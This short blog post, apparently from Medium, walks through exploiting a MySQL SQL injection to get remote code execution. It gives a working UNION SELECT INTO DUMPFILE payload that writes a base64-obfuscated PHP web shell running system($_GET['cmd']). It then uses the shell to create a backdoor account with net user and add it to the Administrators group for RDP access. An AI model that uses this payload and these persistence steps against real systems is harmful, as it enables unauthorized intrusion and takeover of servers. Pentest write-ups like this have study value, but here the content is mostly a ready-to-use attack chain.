SQL Injection & Remote Code Execution [MySQL]

We use sqlmap to verify which revealed that the parameter has a sql injection vulnerability.

we can use sql injection to create a file by use into dumpfile and make a simple backdoor with base64.

system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7y=1') UNION ALL SELECT NULL,...,NULL,”<?php eval(base64_decode(‘c3lzdGVtKCRfR0VUWyJjbWQiXSk7’)); ?>”,...,NULL into dumpfile 283shell.php -- -

we can access to the backdoor and execute “whoami” command.

Then, using the net user command, we create an account to use RDP.

net user sa *password* /add

and make sa account to Administrators localgroup

net localgroup Administrators sa /add

login RDP with our credentials.

Finally, we are able to log in to RDP.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
GrimTheRipper

You get the best out of others when you give the best of yourself